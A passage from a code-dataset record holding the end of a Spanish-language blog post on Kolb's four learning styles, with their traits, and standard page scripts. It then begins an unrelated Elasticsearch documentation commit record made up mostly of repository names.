kolb\"><\/span><\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Acorde este modelo una persona sulee establecer su estilo de aprendizaje en 1 o m\u00e1ximo 2 de estas fases y de esta menera podemos clasificar a nuestros estudiantes acorde la fase que prefieran trabajar.<\/p>\n<\/div>\n<div class=\"ulist\">\n<ul>\n<li>\n<p>Activo<\/p>\n<\/li>\n<li>\n<p>Reflexivo<\/p>\n<\/li>\n<li>\n<p>Te\u00f3rico<\/p>\n<\/li>\n<li>\n<p>Pragm\u00e1tico<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<div class=\"sect2\">\n<h3 id=\"_car_ter_sticas_de_cada_estilo\">Car\u00e1ter\u00edsticas de cada estilo<\/h3>\n<div class=\"paragraph\">\n<p>Para lograr proponer\/emplear estrategias de aprendizaje apropiadas para cada estilo revisemos las caracter\u00edsticas de cada uno:<\/p>\n<\/div>\n<table class=\"tableblock frame-all grid-all\">\n<caption class=\"title\">Table 1. Caracter\u00edsticas Estilos de parendizaje modelo Kolb<\/caption>\n<colgroup>\n<col>\n<col>\n<col>\n<col>\n<\/colgroup>\n<thead>\n<tr>\n<th class=\"tableblock halign-left valign-top\">Estilo<\/th>\n<th class=\"tableblock halign-left valign-top\">Caracter\u00edstica General<\/th>\n<th class=\"tableblock halign-left valign-top\">Cuando facilita el aprendizaje<\/th>\n<th class=\"tableblock halign-left valign-top\">Cuando NO facilita el aprendizaje.<\/th>\n<\/tr>\n<\/thead>\n<tfoot>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Pr\u00e1gm\u00e1ticos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Gustan de poner en pr\u00e1ctica las ideas, teor\u00edas, t\u00e9cnicas nuevas y verificar su funcionamiento, forma de uso\/aplicaci\u00f3n. Generan\/buscan ideas y las ejecutan inmediatamente. Se basan en la realidad para plantear alternativas a fin de de tomar decisiones sobre algo. Buscan desaf\u00edos, replantear algo con una diferente perspectiva. Discuten un tema brevemenete, les aburren los debates largos. <strong>La pregunta que quieren responder es: <em>\u00bfQu\u00e9 pasar\u00eda si?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Actividades que enlacen la teor\u00eda con la pr\u00e1ctica. Visualizan trabajo\/movimiento\/acci\u00f3n. Posibilidad de aplicaci\u00f3n de algo aprendido.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando todo queda en teor\u00eda. Lo aprendido no se vincula con la realidad o necesidades puntuales. Actividades que no se identifique una finalidad con claridad.<\/p><\/td>\n<\/tr>\n<\/tfoot>\n<tbody>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Activos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Se involucran totalmente y sin prejuicios en las experiencias nuevas.\nDisfrutan el momento y cada acontecimiiento. Entusiastas ente lo nuevo. Actuan primero y luego piensan en las consecuencias. Disfrutan trabajando en equipo siendo el eje del grupo. Les aburre planificar a largo plazo y consolidar poryectos.\n<strong>La pregunta que buscan responder en el aprendizaje es: <em>\u00bfC\u00f3mo?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Plantendo actividades desafiantes . Actividades de resultados immediatos o a corto plazo. Actividades activas de emoci\u00f3n, drama, acci\u00f3n.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Siendo pasivos. Demasiado an\u00e1lisis de un tema o mucha reflexi\u00f3n sobre algo. Trabajo individual.<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Reflexivo<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Adoptan una postura observadora de an\u00e1lsis en base a datos, experiencias desde varias perpectivas.Establecen conclusiones en base a argumentos s\u00f3lidos y convincentes. Son precavidos y analizan todas las implicaciones de cualquier acci\u00f3n antes de ponerse en\nmovimiento. En las reuniones observan y escuchan antes de hablar procurando pasar desapercibidos. <strong>La pregunta que quieren responder con el aprendizaje es: <em>\u00bfPor qu\u00e9?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando pueden tener una postura de observador. Analizar situaciones. Se les facilita informaci\u00f3n o datos. Tienen tiempo para reflexionar antes de actuar.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Se exigen ser centro o eje de atenci\u00f3n. Actividades de soluci\u00f3n inmediata. Improvisaci\u00f3n sobre algo. Actividades que le apresuren.<\/p><\/td>\n<\/tr>\n<tr>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Te\u00f3ricos<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Adaptan e intergran las teor\u00edas o fundamentos de forma l\u00f3gica. Organizan las cosas de forma secuencial, integrada y coherente. Analizan y sintetizan informaci\u00f3n de forma racional. No son subjetivos ni il\u00f3gicos. <strong>La pregutna que quieren responder es: <em>\u00bfQu\u00e9?<\/em><\/strong><\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Cuando se parte de teor\u00edas, modelos, sistemas. Ideas o conceptos desafiantes. Actividades que propicien la indagaci\u00f3n o cuestionamientos.<\/p><\/td>\n<td class=\"tableblock halign-left valign-top\"><p class=\"tableblock\">Actividades abiguas o que generen incertidumbre. Actividades\/situaciones que prioricen sentimientos o emociones. Cuando no se les facilita la teor\u00eda o bases conceptuales.<\/p><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<div class=\"admonitionblock note\">\n<table>\n<tr>\n<td class=\"icon\">\n<i class=\"fa icon-note\" title=\"Note\"><\/i>\n<\/td>\n<td class=\"content\">\nEste valor de 3274 d\u00f3lares es el cambio del euro (3000) a dolar.\n<\/td>\n<\/tr>\n<\/table>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n <\/section>\n\n <\/article>\n\n \n <section class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <script type=\"text\/javascript\">\n var disqus_shortname = 'marchelo2212'; \/\/ required: replace example with your forum shortname\n \/* * * DON'T EDIT BELOW THIS LINE * * *\/\n (function() {\n var dsq = document.createElement('script'); dsq.type = 'text\/javascript'; dsq.async = true;\n dsq.src = '\/\/' + disqus_shortname + '.disqus.com\/embed.js';\n (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);\n })();\n <\/script>\n <noscript>Please enable JavaScript to view the <a href=\"http:\/\/disqus.com\/?ref_noscript\">comments powered by Disqus.<\/a><\/noscript>\n <a href=\"http:\/\/disqus.com\" class=\"dsq-brlink\">comments powered by <span class=\"logo-disqus\">Disqus<\/span><\/a>\n <\/section>\n \n\n\n\n <footer class=\"footer\">\n <span class=\"footer__copyright\">© 2016. All rights reserved.<\/span>\n <span class=\"footer__copyright\"><a href=\"http:\/\/uno.daleanthony.com\" title=\"link to page for Uno Ghost theme\">Uno theme<\/a> by <a href=\"http:\/\/daleanthony.com\" title=\"link to website for Dale-Anthony\">Dale-Anthony<\/a><\/span>\n <span class=\"footer__copyright\">Proudly published with <a href=\"http:\/\/hubpress.io\" title=\"link to Hubpress website\">Hubpress<\/a><\/span>\n <\/footer>\n <\/div>\n <\/div>\n\n <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/moment.js\/2.9.0\/moment-with-locales.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/highlight.min.js?v=\"><\/script> \n <script type=\"text\/javascript\">\n jQuery( document ).ready(function() {\n \/\/ change date with ago\n jQuery('ago.ago').each(function(){\n var element = jQuery(this).parent();\n element.html( moment(element.text()).fromNow());\n });\n });\n\n hljs.initHighlightingOnLoad(); \n <\/script>\n\n <script type=\"text\/javascript\" src=\"\/\/marchelo2212.github.io\/themes\/uno\/assets\/js\/main.js?v=1.0.0\"><\/script>\n \n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n })(window,document,'script','\/\/www.google-analytics.com\/analytics.js','ga');\n\n ga('create', 'UA-70778105-1', 'auto');\n ga('send', 'pageview');\n\n <\/script>\n\n<\/body>\n<\/html>\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"85ef44fd73a1fe5f77ec0c2d97896c7b451ad10f","subject":"Docs: Fix missing comma and boolean true","message":"Docs: Fix missing comma and boolean true\n\nCloses #9350\n","repos":"socialrank\/elasticsearch,sreeramjayan\/elasticsearch,adrianbk\/elasticsearch,rhoml\/elasticsearch,gfyoung\/elasticsearch,abibell\/elasticsearch,mbrukman\/elasticsearch,lchennup\/elasticsearch,szroland\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,mapr\/elasticsearch,yuy168\/elasticsearch,markllama\/elasticsearch,easonC\/elasticsearch,EasonYi\/elasticsearch,easonC\/elasticsearch,scorpionvicky\/elasticsearch,drewr\/elasticsearch,AshishThakur\/elasticsearch,AndreKR\/elasticsearch,awislowski\/elasticsearch,nrkkalyan\/elasticsearch,a2lin\/elasticsearch,sdauletau\/elasticsearch,vroyer\/elasticassandra,Ansh90\/elasticsearch,fernandozhu\/elasticsearch,huypx1292\/elasticsearch,Liziyao\/elasticsearch,acchen97\/elasticsearch,markharwood\/elasticsearch,jimhooker2002\/elasticsearch,ckclark\/elasticsearch,bestwpw\/elasticsearch,YosuaMichael\/elasticsearch,Shepard1212\/elasticsearch,codebunt\/elasticsearch,slavau\/elasticsearch,pritishppai\/elasticsearch,rhoml\/elasticsearch,overcome\/elasticsearch,kevinkluge\/elasticsearch,jeteve\/elasticsearch,cnfire\/elasticsearch-1,s1monw\/elasticsearch,myelin\/elasticsearch,sreeramjayan\/elasticsearch,dataduke\/elasticsearch,hanst\/elasticsearch,davidvgalbraith\/elasticsearch,tkssharma\/elasticsearch,mute\/elasticsearch,amit-shar\/elasticsearch,Liziyao\/elasticsearch,mrorii\/elasticsearch,mkis-\/elasticsearch,kingaj\/elasticsearch,EasonYi\/elasticsearch,franklanganke\/elasticsearch,Rygbee\/elasticsearch,PhaedrusTheGreek\/elasticsearch,petabytedata\/elasticsearch,obourgain\/elasticsearch,KimTaehee\/elasticsearch,jchampion\/elasticsearch,smflorentino\/elasticsearch,lydonchandra\/elasticsearch,nazarewk\/elasticsearch,wittyameta\/elasticsearch,sjohnr\/elasticsearch,iantruslove\/elasticsearch,kevinkluge\/elasticsearch,StefanGor\/elasticsearch,MichaelLiZhou\/elasticsearch,springning\/elasticsearch,iamjakob\/elasticsearch,AshishThakur\/elasticsearch,vvcephei\/elasticsearch,sc0ttkclark\/elasticsearch,jaynblue\/elasticsearch,tahaemin\/elasticsearch,slavau\/elasticsearch,huanzhong\/elasticsearch,rajanm\/elasticsearch,episerver\/elasticsearch,ouyangkongtong\/elasticsearch,ImpressTV\/elasticsearch,Helen-Zhao\/elasticsearch,snikch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,bawse\/elasticsearch,sauravmondallive\/elasticsearch,khiraiwa\/elasticsearch,LeoYao\/elasticsearch,golubev\/elasticsearch,sreeramjayan\/elasticsearch,hanswang\/elasticsearch,huypx1292\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,markharwood\/elasticsearch,rlugojr\/elasticsearch,iantruslove\/elasticsearch,tebriel\/elasticsearch,rhoml\/elasticsearch,rento19962\/elasticsearch,nilabhsagar\/elasticsearch,liweinan0423\/elasticsearch,amaliujia\/elasticsearch,vvcephei\/elasticsearch,jaynblue\/elasticsearch,koxa29\/elasticsearch,MaineC\/elasticsearch,weipinghe\/elasticsearch,andrestc\/elasticsearch,jbertouch\/elasticsearch,elasticdog\/elasticsearch,jprante\/elasticsearch,lchennup\/elasticsearch,nrkkalyan\/elasticsearch,NBSW\/elasticsearch,bestwpw\/elasticsearch,javachengwc\/elasticsearch,alexshadow007\/elasticsearch,iantruslove\/elasticsearch,Shekharrajak\/elasticsearch,wbowling\/elasticsearch,adrianbk\/elasticsearch,masaruh\/elasticsearch,chrismwendt\/elasticsearch,codebunt\/elasticsearch,heng4fun\/elasticsearch,MetSystem\/elasticsearch,lydonchandra\/elasticsearch,hydro2k\/elasticsearch,lydonchandra\/elasticsearch,javachengwc\/elasticsearch,dylan8902\/elasticsearch,KimTaehee\/elasticsearch,strapdata\/elassandra5-rc,kubum\/elasticsearch,xuzha\/elasticsearch,acchen97\/elasticsearch,Flipkart\/elasticsearch,mnylen\/elasticsearch,diendt\/elasticsearch,karthikjaps\/elasticsearch,Stacey-Gammon\/elasticsearch,vietlq\/elasticsearch,AshishThakur\/elasticsearch,NBSW\/elasticsearch,elasticdog\/elasticsearch,Chhunlong\/elasticsearch,xuzha\/elasticsearch,infusionsoft\/elasticsearch,artnowo\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,mrorii\/elasticsearch,wenpos\/elasticsearch,feiqitian\/elasticsearch,karthikjaps\/elasticsearch,tahaemin\/elasticsearch,lks21c\/elasticsearch,fekaputra\/elasticsearch,tahaemin\/elasticsearch,lzo\/elasticsearch-1,Clairebi\/ElasticsearchClone,scorpionvicky\/elasticsearch,fekaputra\/elasticsearch,ESamir\/elasticsearch,djschny\/elasticsearch,snikch\/elasticsearch,Stacey-Gammon\/elasticsearch,queirozfcom\/elasticsearch,wangyuxue\/elasticsearch,vrkansagara\/elasticsearch,pablocastro\/elasticsearch,loconsolutions\/elasticsearch,a2lin\/elasticsearch,Shepard1212\/elasticsearch,mcku\/elasticsearch,easonC\/elasticsearch,aglne\/elasticsearch,mapr\/elasticsearch,nknize\/elasticsearch,gmarz\/elasticsearch,maddin2016\/elasticsearch,schonfeld\/elasticsearch,milodky\/elasticsearch,Stacey-Gammon\/elasticsearch,xingguang2013\/elasticsearch,rlugojr\/elasticsearch,Shekharrajak\/elasticsearch,anti-social\/elasticsearch,nknize\/elasticsearch,awislowski\/elasticsearch,szroland\/elasticsearch,AshishThakur\/elasticsearch,mgalushka\/elasticsearch,pozhidaevak\/elasticsearch,lydonchandra\/elasticsearch,markllama\/elasticsearch,strapdata\/elassandra5-rc,likaiwalkman\/elasticsearch,loconsolutions\/elasticsearch,sjohnr\/elasticsearch,vroyer\/elassandra,martinstuga\/elasticsearch,brandonkearby\/elasticsearch,kalburgimanjunath\/elasticsearch,sjohnr\/elasticsearch,jango2015\/elasticsearch,winstonewert\/elasticsearch,AndreKR\/elasticsearch,dongjoon-hyun\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,acchen97\/elasticsearch,schonfeld\/elasticsearch,a2lin\/elasticsearch,pablocastro\/elasticsearch,wayeast\/elasticsearch,Fsero\/elasticsearch,ulkas\/elasticsearch,dylan8902\/elasticsearch,onegambler\/elasticsearch,xpandan\/elasticsearch,ESamir\/elasticsearch,mm0\/elasticsearch,YosuaMichael\/elasticsearch,alexkuk\/elasticsearch,wayeast\/elasticsearch,nazarewk\/elasticsearch,kkirsche\/elasticsearch,Uiho\/elasticsearch,Shepard1212\/elasticsearch,mjhennig\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Helen-Zhao\/elasticsearch,mm0\/elasticsearch,golubev\/elasticsearch,yongminxia\/elasticsearch,hydro2k\/elasticsearch,rajanm\/elasticsearch,infusionsoft\/elasticsearch,kaneshin\/elasticsearch,chirilo\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra-test,alexkuk\/elasticsearch,SergVro\/elasticsearch,sreeramjayan\/elasticsearch,wayeast\/elasticsearch,trangvh\/elasticsearch,polyfractal\/elasticsearch,lks21c\/elasticsearch,mbrukman\/elasticsearch,aglne\/elasticsearch,tsohil\/elasticsearch,Fsero\/elasticsearch,thecocce\/elasticsearch,henakamaMSFT\/elasticsearch,szroland\/elasticsearch,caengcjd\/elasticsearch,mikemccand\/elasticsearch,kaneshin\/elasticsearch,mmaracic\/elasticsearch,jbertouch\/elasticsearch,springning\/elasticsearch,schonfeld\/elasticsearch,mmaracic\/elasticsearch,onegambler\/elasticsearch,ESamir\/elasticsearch,Siddartha07\/elasticsearch,myelin\/elasticsearch,s1monw\/elasticsearch,girirajsharma\/elasticsearch,pablocastro\/elasticsearch,ulkas\/elasticsearch,slavau\/elasticsearch,lks21c\/elasticsearch,ricardocerq\/elasticsearch,dpursehouse\/elasticsearch,Shekharrajak\/elasticsearch,mjhennig\/elasticsearch,wayeast\/elasticsearch,jsgao0\/elasticsearch,sc0ttkclark\/elasticsearch,spiegela\/elasticsearch,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,nomoa\/elasticsearch,ckclark\/elasticsearch,MaineC\/elasticsearch,uschindler\/elasticsearch,ulkas\/elasticsearch,chirilo\/elasticsearch,karthikjaps\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,hirdesh2008\/elasticsearch,mbrukman\/elasticsearch,pritishppai\/elasticsearch,kevinkluge\/elasticsearch,jsgao0\/elasticsearch,sc0ttkclark\/elasticsearch,MetSystem\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fernandozhu\/elasticsearch,mapr\/elasticsearch,pozhidaevak\/elasticsearch,elancom\/elasticsearch,HarishAtGitHub\/elasticsearch,jimhooker2002\/elasticsearch,18098924759\/elasticsearch,likaiwalkman\/elasticsearch,iacdingping\/elasticsearch,thecocce\/elasticsearch,a2lin\/elasticsearch,kingaj\/elasticsearch,Flipkart\/elasticsearch,masterweb121\/elasticsearch,truemped\/elasticsearch,HonzaKral\/elasticsearch,socialrank\/elasticsearch,davidvgalbraith\/elasticsearch,ouyangkongtong\/elasticsearch,18098924759\/elasticsearch,vrkansagara\/elasticsearch,MetSystem\/elasticsearch,mbrukman\/elasticsearch,coding0011\/elasticsearch,kenshin233\/elasticsearch,kkirsche\/elasticsearch,wangtuo\/elasticsearch,apepper\/elasticsearch,gfyoung\/elasticsearch,diendt\/elasticsearch,liweinan0423\/elasticsearch,gmarz\/elasticsearch,wittyameta\/elasticsearch,xingguang2013\/elasticsearch,robin13\/elasticsearch,tsohil\/elasticsearch,fred84\/elasticsearch,JackyMai\/elasticsearch,Asimov4\/elasticsearch,yynil\/elasticsearch,glefloch\/elasticsearch,snikch\/elasticsearch,ZTE-PaaS\/elasticsearch,rmuir\/elasticsearch,xpandan\/elasticsearch,robin13\/elasticsearch,Chhunlong\/elasticsearch,Ansh90\/elasticsearch,tsohil\/elasticsearch,JervyShi\/elasticsearch,sauravmondallive\/elasticsearch,avikurapati\/elasticsearch,fforbeck\/elasticsearch,lzo\/elasticsearch-1,hechunwen\/elasticsearch,yanjunh\/elasticsearch,mgalushka\/elasticsearch,iantruslove\/elasticsearch,mgalushka\/elasticsearch,scottsom\/elasticsearch,Chhunlong\/elasticsearch,amaliujia\/elasticsearch,pranavraman\/elasticsearch,strapdata\/elassandra5-rc,Siddartha07\/elasticsearch,gingerwizard\/elasticsearch,easonC\/elasticsearch,nellicus\/elasticsearch,vroyer\/elassandra,szroland\/elasticsearch,snikch\/elasticsearch,nilabhsagar\/elasticsearch,davidvgalbraith\/elasticsearch,clintongormley\/elasticsearch,Charlesdong\/elasticsearch,Liziyao\/elasticsearch,jprante\/elasticsearch,areek\/elasticsearch,ImpressTV\/elasticsearch,C-Bish\/elasticsearch,iamjakob\/elasticsearch,abibell\/elasticsearch,JSCooke\/elasticsearch,kunallimaye\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra5-rc,nomoa\/elasticsearch,huypx1292\/elasticsearch,AndreKR\/elasticsearch,andrejserafim\/elasticsearch,khiraiwa\/elasticsearch,mapr\/elasticsearch,smflorentino\/elasticsearch,Asimov4\/elasticsearch,karthikjaps\/elasticsearch,luiseduardohdbackup\/elasticsearch,ouyangkongtong\/elasticsearch,dpursehouse\/elasticsearch,kalburgimanjunath\/elasticsearch,zeroctu\/elasticsearch,avikurapati\/elasticsearch,dylan8902\/elasticsearch,lks21c\/elasticsearch,queirozfcom\/elasticsearch,StefanGor\/elasticsearch,hafkensite\/elasticsearch,iamjakob\/elasticsearch,andrejserafim\/elasticsearch,JervyShi\/elasticsearch,mcku\/elasticsearch,Liziyao\/elasticsearch,iamjakob\/elasticsearch,jango2015\/elasticsearch,lmtwga\/elasticsearch,TonyChai24\/ESSource,jprante\/elasticsearch,sc0ttkclark\/elasticsearch,StefanGor\/elasticsearch,alexkuk\/elasticsearch,abibell\/elasticsearch,obourgain\/elasticsearch,IanvsPoplicola\/elasticsearch,jeteve\/elasticsearch,kkirsche\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,AshishThakur\/elasticsearch,wenpos\/elasticsearch,himanshuag\/elasticsearch,wangtuo\/elasticsearch,mnylen\/elasticsearch,knight1128\/elasticsearch,achow\/elasticsearch,i-am-Nathan\/elasticsearch,Siddartha07\/elasticsearch,ZTE-PaaS\/elasticsearch,rlugojr\/elasticsearch,qwerty4030\/elasticsearch,dylan8902\/elasticsearch,mnylen\/elasticsearch,franklanganke\/elasticsearch,umeshdangat\/elasticsearch,infusionsoft\/elasticsearch,Microsoft\/elasticsearch,skearns64\/elasticsearch,kkirsche\/elasticsearch,nilabhsagar\/elasticsearch,fekaputra\/elasticsearch,vvcephei\/elasticsearch,anti-social\/elasticsearch,heng4fun\/elasticsearch,andrestc\/elasticsearch,StefanGor\/elasticsearch,clintongormley\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,mkis-\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,rento19962\/elasticsearch,lzo\/elasticsearch-1,andrejserafim\/elasticsearch,wimvds\/elasticsearch,MjAbuz\/elasticsearch,feiqitian\/elasticsearch,fernandozhu\/elasticsearch,masterweb121\/elasticsearch,camilojd\/elasticsearch,Fsero\/elasticsearch,yynil\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,nazarewk\/elasticsearch,vietlq\/elasticsearch,EasonYi\/elasticsearch,himanshuag\/elasticsearch,amit-shar\/elasticsearch,LeoYao\/elasticsearch,rento19962\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,Widen\/elasticsearch,mikemccand\/elasticsearch,jchampion\/elasticsearch,polyfractal\/elasticsearch,heng4fun\/elasticsearch,xingguang2013\/elasticsearch,overcome\/elasticsearch,fred84\/elasticsearch,awislowski\/elasticsearch,sjohnr\/elasticsearch,hafkensite\/elasticsearch,pranavraman\/elasticsearch,masaruh\/elasticsearch,codebunt\/elasticsearch,mrorii\/elasticsearch,zeroctu\/elasticsearch,TonyChai24\/ESSource,maddin2016\/elasticsearch,szroland\/elasticsearch,mm0\/elasticsearch,MichaelLiZhou\/elasticsearch,skearns64\/elasticsearch,phani546\/elasticsearch,SergVro\/elasticsearch,vingupta3\/elasticsearch,HonzaKral\/elasticsearch,NBSW\/elasticsearch,strapdata\/elassandra-test,elancom\/elasticsearch,wenpos\/elasticsearch,mnylen\/elasticsearch,ulkas\/elasticsearch,easonC\/elasticsearch,ivansun1010\/elasticsearch,Flipkart\/elasticsearch,xpandan\/elasticsearch,sc0ttkclark\/elasticsearch,adrianbk\/elasticsearch,iamjakob\/elasticsearch,achow\/elasticsearch,lightslife\/elasticsearch,vietlq\/elasticsearch,Flipkart\/elasticsearch,pablocastro\/elasticsearch,palecur\/elasticsearch,Collaborne\/elasticsearch,zhiqinghuang\/elasticsearch,dataduke\/elasticsearch,njlawton\/elasticsearch,kenshin233\/elasticsearch,luiseduardohdbackup\/elasticsearch,golubev\/elasticsearch,adrianbk\/elasticsearch,Clairebi\/ElasticsearchClone,loconsolutions\/elasticsearch,jimhooker2002\/elasticsearch,hirdesh2008\/elasticsearch,phani546\/elasticsearch,camilojd\/elasticsearch,smflorentino\/elasticsearch,cnfire\/elasticsearch-1,likaiwalkman\/elasticsearch,henakamaMSFT\/elasticsearch,trangvh\/elasticsearch,Microsoft\/elasticsearch,C-Bish\/elasticsearch,franklanganke\/elasticsearch,wenpos\/elasticsearch,tahaemin\/elasticsearch,diendt\/elasticsearch,anti-social\/elasticsearch,chirilo\/elasticsearch,linglaiyao1314\/elasticsearch,Kakakakakku\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,tahaemin\/elasticsearch,loconsolutions\/elasticsearch,iacdingping\/elasticsearch,18098924759\/elasticsearch,qwerty4030\/elasticsearch,bawse\/elasticsearch,dylan8902\/elasticsearch,mcku\/elasticsearch,btiernay\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch,vingupta3\/elasticsearch,F0lha\/elasticsearch,markllama\/elasticsearch,phani546\/elasticsearch,huanzhong\/elasticsearch,himanshuag\/elasticsearch,jsgao0\/elasticsearch,cwurm\/elasticsearch,iantruslove\/elasticsearch,obourgain\/elasticsearch,camilojd\/elasticsearch,cnfire\/elasticsearch-1,hydro2k\/elasticsearch,wbowling\/elasticsearch,bestwpw\/elasticsearch,EasonYi\/elasticsearch,Rygbee\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,andrestc\/elasticsearch,yuy168\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,Rygbee\/elasticsearch,iantruslove\/elasticsearch,amaliujia\/elasticsearch,overcome\/elasticsearch,truemped\/elasticsearch,spiegela\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,Helen-Zhao\/elasticsearch,kenshin233\/elasticsearch,drewr\/elasticsearch,LewayneNaidoo\/elasticsearch,wimvds\/elasticsearch,abibell\/elasticsearch,kubum\/elasticsearch,markwalkom\/elasticsearch,kenshin233\/elasticsearch,abibell\/elasticsearch,pranavraman\/elasticsearch,slavau\/elasticsearch,strapdata\/elassandra-test,schonfeld\/elasticsearch,kimimj\/elasticsearch,JSCooke\/elasticsearch,Widen\/elasticsearch,btiernay\/elasticsearch,elancom\/elasticsearch,gmarz\/elasticsearch,fekaputra\/elasticsearch,nellicus\/elasticsearch,chirilo\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,obourgain\/elasticsearch,sposam\/elasticsearch,szroland\/elasticsearch,springning\/elasticsearch,xpandan\/elasticsearch,wittyameta\/elasticsearch,hydro2k\/elasticsearch,fekaputra\/elasticsearch,HonzaKral\/elasticsearch,vrkansagara\/elasticsearch,Chhunlong\/elasticsearch,nazarewk\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,jeteve\/elasticsearch,pritishppai\/elasticsearch,coding0011\/elasticsearch,anti-social\/elasticsearch,jaynblue\/elasticsearch,rento19962\/elasticsearch,avikurapati\/elasticsearch,MetSystem\/elasticsearch,SergVro\/elasticsearch,huypx1292\/elasticsearch,likaiwalkman\/elasticsearch,lmtwga\/elasticsearch,weipinghe\/elasticsearch,kubum\/elasticsearch,vingupta3\/elasticsearch,jeteve\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,mikemccand\/elasticsearch,henakamaMSFT\/elasticsearch,chirilo\/elasticsearch,dylan8902\/elasticsearch,PhaedrusTheGreek\/elasticsearch,nellicus\/elasticsearch,lightslife\/elasticsearch,sdauletau\/elasticsearch,amit-shar\/elasticsearch,gfyoung\/elasticsearch,pablocastro\/elasticsearch,tahaemin\/elasticsearch,wittyameta\/elasticsearch,uschindler\/elasticsearch,hanswang\/elasticsearch,wuranbo\/elasticsearch,nknize\/elasticsearch,markllama\/elasticsearch,lchennup\/elasticsearch,strapdata\/elassandra-test,kubum\/elasticsearch,Collaborne\/elasticsearch,luiseduardohdbackup\/elasticsearch,caengcjd\/elasticsearch,wimvds\/elasticsearch,Collaborne\/elasticsearch,ouyangkongtong\/elasticsearch,njlawton\/elasticsearch,jimhooker2002\/elasticsearch,springning\/elasticsearch,hafkensite\/elasticsearch,likaiwalkman\/elasticsearch,Clairebi\/ElasticsearchClone,myelin\/elasticsearch,xingguang2013\/elasticsearch,milodky\/elasticsearch,vietlq\/elasticsearch,sdauletau\/elasticsearch,koxa29\/elasticsearch,areek\/elasticsearch,nellicus\/elasticsearch,polyfractal\/elasticsearch,brandonkearby\/elasticsearch,jango2015\/elasticsearch,dataduke\/elasticsearch,kalimatas\/elasticsearch,nrkkalyan\/elasticsearch,kimimj\/elasticsearch,elancom\/elasticsearch,lmtwga\/elasticsearch,ouyangkongtong\/elasticsearch,areek\/elasticsearch,sauravmondallive\/elasticsearch,cnfire\/elasticsearch-1,hanswang\/elasticsearch,kunallimaye\/elasticsearch,skearns64\/elasticsearch,clintongormley\/elasticsearch,Charlesdong\/elasticsearch,jchampion\/elasticsearch,mnylen\/elasticsearch,ThalaivaStars\/OrgRepo1,diendt\/elasticsearch,artnowo\/elasticsearch,clintongormley\/elasticsearch,mjhennig\/elasticsearch,mrorii\/elasticsearch,rento19962\/elasticsearch,mcku\/elasticsearch,Charlesdong\/elasticsearch,Shekharrajak\/elasticsearch,nrkkalyan\/elasticsearch,mjhennig\/elasticsearch,alexkuk\/elasticsearch,achow\/elasticsearch,YosuaMichael\/elasticsearch,drewr\/elasticsearch,alexshadow007\/elasticsearch,ImpressTV\/elasticsearch,franklanganke\/elasticsearch,linglaiyao1314\/elasticsearch,codebunt\/elasticsearch,xuzha\/elasticsearch,btiernay\/elasticsearch,knight1128\/elasticsearch,HarishAtGitHub\/elasticsearch,hechunwen\/e